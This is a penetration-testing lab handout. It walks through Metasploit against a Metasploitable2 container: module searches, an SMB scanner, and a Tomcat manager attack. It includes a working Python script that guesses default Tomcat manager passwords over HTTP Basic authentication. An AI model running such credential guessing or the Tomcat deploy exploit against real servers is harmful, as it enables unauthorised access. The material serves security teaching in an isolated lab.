Metasploit Lab
Overview
With the data obtained from scanning, you can attempt to exploit the vulnerabilities discovered.
Tools Used
• Kali Linux or another OS (preferably a Linux/Unix based system)
• Metasploit Framework
• Armitage
• Metasploitable2
• Docker
Target: Metasploitable2 Docker container (172.17.0.0/24 Docker bridge network)
Purpose
The aim of this lab is to develop and execute exploits against a remote machine and test its vulnerabilities using Metasploit.
1/11 2/20/24, 8:58 PM
Tasks / Lab Requirements
Task 0: Set up the environment
We will install the Docker container engine on the Kali Linux (or equivalent) virtual machine (VM), then download and run the Metasploitable2 container inside that VM.
1. To start, update your package lists on the Kali VM and install the docker.io package:
sudo apt-get update && sudo apt-get install docker.io -y
2. Download, install, and run the Metasploitable2 machine:
sudo docker run -it tleemcjr/metasploitable2:latest sh -c "/bin/services.sh && bash"
3. When Docker has finished pulling the image it starts the container in interactive mode, so keep that terminal open. Run the ifconfig command inside that terminal to verify that an IP is set. It should be 172.17.0.2, the first address handed out on Docker's default bridge network; if other containers are already running it may differ, and you can confirm it from the host with docker inspect on the container.
4. Ensure your VM and the container can communicate with each other by pinging the container's IP from another terminal on the VM, and by pinging the VM's bridge address (172.17.0.1 by default) from inside the container.
Deliverables:
• Provide a screenshot showing that the two systems can ping each other.
Task 1: Using Metasploit, starting the tool
We are going to start exploring the Metasploit console and look at a few of the basic commands you can perform.
1. To start Metasploit, open a terminal on the Linux VM and issue the command below; it should give you roughly the result seen in the image. Metasploit picks one of several banners at launch, so the banner may not always look like the one shown.
msfconsole
2. Once it loads you will see one of the banners, the version and module counts, and the msf6 > prompt:

┌──(kali㉿kali)-[~]
└─$ msfconsole

[ASCII-art banner; it varies between launches]

https://metasploit.com

       =[ metasploit v6.2.36-dev                          ]
+ -- --=[ 2277 exploits - 1194 auxiliary - 408 post       ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Save the current environment with the
save command, future console restarts will use this
environment again
Metasploit Documentation: https://docs.metasploit.com/

msf6 >
3. As we can see there are plenty of modules in each category. We can use the show command to list the contents of a category; for example, the command below lists every module in the payloads category (note that once you are inside an exploit module, show payloads lists only the payloads compatible with that exploit).
show payloads
4. We can also use the search command to search through the modules. This is useful for finding a specific payload for your exploit or an auxiliary module that you want to use. Let's look for a
5. We will use search to look for the EternalBlue attack (ms17_010). We should see some exploit and auxiliary modules related to our search. Note at the bottom that we can interact with these modules by name or by index number. (MS17-010 is a Windows SMB vulnerability; the Metasploitable2 target is Linux running Samba, so this search and the scan that follows are for practicing the workflow, not for compromising the lab target.)
msf6 > search ms17_010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection

Interact with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/smb/smb_ms17_010

6. Use the command below to view the info about module number 3. It provides details such as the name, module path, rank, options, and description.
info 3
7. Below we use the command use 3 to enter that module; the prompt changes to show the selected module. Running show options then lists its options. Note that the options marked yes in the Required column (the red boxes in the original screenshot) must be set before the module will run; those marked no can be left at their defaults.

msf6 > use 3
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain                                                                    no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smb/smb_ms17_010) >

8. To set an item, use the set command followed by the option name and the value. After setting options it is good practice to run show options again to verify that they were set properly (catching typos or wrong values; a misspelled option name such as RHOST instead of RHOSTS creates a harmless new variable instead of setting the real option, and the Required column will still show RHOSTS empty). Below is an example of setting RHOSTS for the module shown previously, using the example IP 192.168.1.22; in this lab the target is the Metasploitable2 container at 172.17.0.2.
set RHOSTS 192.168.1.22
9. After everything has been verified, use the run command to launch the auxiliary module. Against the Linux/Samba target of this lab do not expect a vulnerable result; the point here is the use / set / show options / run workflow.
10. Within the MSF console you can issue the help command for details of the commands you can run. It lists the core commands, plus commands specific to the auxiliary module currently in use. Below is the segment of the help output that relates to the current module.

Auxiliary Commands
==================

    Command   Description
    -------   -----------
    check     Check to see if a target is vulnerable
    exploit   This is an alias for the run command
    rcheck    Reloads the module and checks if the target is vulnerable
    recheck   This is an alias for the rcheck command
    reload    Reloads the auxiliary module
    rerun     Reloads and launches the auxiliary module
    rexploit  This is an alias for the rerun command
    run       Launches the auxiliary module
11. That's it, this section is complete
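The steps above (search, use, set, show options, run) can be scripted so that the Required-column check is not left to eyeballing the table. The following is an added example written for this edit, not code from the lab or from Metasploit: it parses the text that show options prints (a constructed, column-shortened copy of the lab's listing is embedded so it runs offline), refuses to build a resource script while a Required option is still empty, flags option names the module does not have (the RHOST vs RHOSTS typo), and writes a script that msfconsole -q -r can execute. The -q and -r flags are real msfconsole flags; the option table is the lab's with the NAMED_PIPES path shortened; the function names and the example RHOSTS value are this example's own.

```python
"""Added example (written for this edit, not code from the lab or from
Metasploit): script the Task 1 workflow (use, set, show options, run) and
enforce the Required column automatically before msfconsole is launched.

Assumptions: SHOW_OPTIONS below is a constructed copy of the lab's
`show options` listing with the NAMED_PIPES path shortened to keep the
columns narrow; msfconsole -q (quiet) and -r (resource file) are real flags;
function names and the example RHOSTS value are this example's own."""
import re
import subprocess
import tempfile

MODULE = "auxiliary/scanner/smb/smb_ms17_010"

SHOW_OPTIONS = """\
Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting     Required  Description
   ----         ---------------     --------  -----------
   CHECK_ARCH   true                no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false               no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  named_pipes.txt     yes       List of named pipes to check
   RHOSTS                           yes       The target host(s)
   RPORT        445                 yes       The SMB service port (TCP)
   SMBDomain                        no        The Windows domain to use for authentication
   SMBPass                          no        The password for the specified username
   SMBUser                          no        The username to authenticate as
   THREADS      1                   yes       The number of concurrent threads (max one per host)
"""

# One table row: NAME  [current setting]  yes|no  description.  The Required
# cell is the first yes/no surrounded by two or more spaces, which is how
# msfconsole pads its columns; settings and descriptions are single-spaced.
ROW = re.compile(r"^\s*(\S+)\s+(.*?)\s{2,}(yes|no)\s{2,}(\S.*)$")


def parse_show_options(text):
    """Return {name: (current_setting, required)} from `show options` output."""
    spec = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            name, setting, required, _desc = m.groups()
            spec[name] = (setting.strip(), required == "yes")
    return spec


def missing_required(spec, settings):
    """Required=yes options that have neither a default nor a value from us:
    the 'show options again and check the Required column' step, in code."""
    return [n for n, (default, req) in spec.items()
            if req and not (settings.get(n) or default)]


def unknown_options(spec, settings):
    """Names we try to set that the module does not have (e.g. RHOST vs RHOSTS)."""
    return sorted(set(settings) - set(spec))


def build_resource_script(module, spec, settings, run=True):
    """msfconsole commands equivalent to: use, set ..., show options, run, exit."""
    bad = unknown_options(spec, settings)
    if bad:
        raise ValueError(f"unknown option(s) for {module}: {bad}")
    need = missing_required(spec, settings)
    if need:
        raise ValueError(f"required option(s) not set: {need}")
    lines = [f"use {module}"]
    lines += [f"set {n} {settings[n]}" for n in spec if n in settings]  # module's order
    lines.append("show options")  # leave the verified settings in the console log
    if run:
        lines += ["run", "exit"]
    return "\n".join(lines) + "\n"


def run_in_msfconsole(rc_text, msfconsole="msfconsole"):
    """Write the resource file and launch `msfconsole -q -r <file>`; returns its exit code."""
    with tempfile.NamedTemporaryFile("w", suffix=".rc", delete=False) as fh:
        fh.write(rc_text)
        rc_path = fh.name
    return subprocess.run([msfconsole, "-q", "-r", rc_path], check=False).returncode


if __name__ == "__main__":
    spec = parse_show_options(SHOW_OPTIONS)
    # 192.168.1.22 is the handout's example; use the container IP (172.17.0.2) for the lab.
    rc = build_resource_script(MODULE, spec, {"RHOSTS": "192.168.1.22", "THREADS": "4"})
    print(rc, end="")
    # run_in_msfconsole(rc)   # uncomment on the Kali VM to actually run the scan
```

On the VM, replace the embedded text by piping a real listing in (for example the output of msfconsole -q -x "use auxiliary/scanner/smb/smb_ms17_010; show options; exit") and the same parser applies to any module, since it keys on the yes/no Required cell rather than fixed column widths.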
Task 2: Exploits with MSF and Armitage
Metasploit Framework
Before starting, ensure that the Metasploitable2 container is started and running.
For this part we have discovered that there is a Tomcat Manager Application Deployer exploit we can run to try to exploit the system.
1. Start Metasploit by opening a terminal and issuing msfconsole, as in Task 1, if you don't already have MSF running.
2. Search for an auxiliary module that will try to log in to the Tomcat Application Manager.
3. Select the module by name or by its index number with the use command.
4. Show the options to see what needs to be set. You will need to set the following options:
• RHOSTS to the IP of the target system (the container, 172.17.0.2)
• RPORT to 8180, the port the Metasploitable2 Tomcat service listens on (the module defaults to Tomcat's standard 8080, so leaving it unchanged will simply fail to connect)
5. Once the options are verified, issue the run command to start the scan.
6. You will see a long list of usernames and passwords being tried; scroll up to find the pair for which the module reported Login Successful. Take note of this information because it will be used for the exploit later.
7. Now search for the exploit module tomcat deploy.
8. Use the exploit module exploit/multi/http/tomcat_mgr_deploy.
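What the Task 2 login scanner does underneath is a series of HTTP Basic authentication attempts against the manager application. The following is an added example written for this edit (not code from the lab, from Metasploit, or from its auxiliary/scanner/http/tomcat_mgr_login module): it builds the Authorization header for each candidate pair, sends it to /manager/html on port 8180, and classifies the response the way the scanner's Login Successful / failed lines do, including the 403 case where the credentials are right but the account lacks the manager role. The candidate list is constructed and deliberately short (the Metasploit module walks its own wordlists); the 172.17.0.2 target and port 8180 are from the lab; the function names are this example's own. Nothing is sent over the network unless the script is run as a program.

```python
"""Added example (written for this edit, not code from the lab or from
Metasploit): the HTTP Basic login attempts behind the Tomcat manager login
scanner used in Task 2.

Assumptions: Metasploitable2's Tomcat listens on 8180 and the manager app is
at /manager/html (both from the lab); CANDIDATES is a small constructed list,
not Metasploit's wordlist; no request is made unless main runs."""
import base64
import urllib.error
import urllib.request

# Constructed candidate pairs; the Metasploit module walks a much longer list.
CANDIDATES = [
    ("admin", "admin"),
    ("manager", "manager"),
    ("tomcat", "s3cret"),
    ("tomcat", "tomcat"),
]


def basic_auth_header(user, password):
    """RFC 7617 header value: 'Basic ' + base64(user:password)."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def classify(status):
    """Map the manager app's HTTP status to what the scanner would report:
    200 credentials accepted and the account has the manager role
    401 credentials rejected (the realm challenge is sent again)
    403 credentials accepted but the account lacks the manager role"""
    return {200: "success", 401: "invalid", 403: "no-manager-role"}.get(
        status, f"unexpected-{status}")


def try_login(host, port, user, password, path="/manager/html", timeout=5):
    """Send one credential pair; return (http_status, classification)."""
    req = urllib.request.Request(
        f"http://{host}:{port}{path}",
        headers={"Authorization": basic_auth_header(user, password)})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status = resp.status
    except urllib.error.HTTPError as e:
        status = e.code  # urllib raises for 401/403; the code is what we want
    return status, classify(status)


def find_valid(host, port, candidates, stop_on_success=True):
    """Walk the candidate list like the scanner; return [(user, password)] that logged in."""
    hits = []
    for user, password in candidates:
        status, kind = try_login(host, port, user, password)
        marker = "+" if kind == "success" else "-"
        print(f"[{marker}] {user}:{password} -> {status} ({kind})")
        if kind == "success":
            hits.append((user, password))
            if stop_on_success:
                break
    return hits


if __name__ == "__main__":
    # Target from the lab: the Metasploitable2 container on the Docker bridge.
    print(find_valid("172.17.0.2", 8180, CANDIDATES))
```

The 403 branch is the one worth keeping in mind when reading the scanner's output: a pair that authenticates but cannot reach the manager role will not deploy a WAR with tomcat_mgr_deploy, so only a 200 counts as the Login Successful you need for the next step.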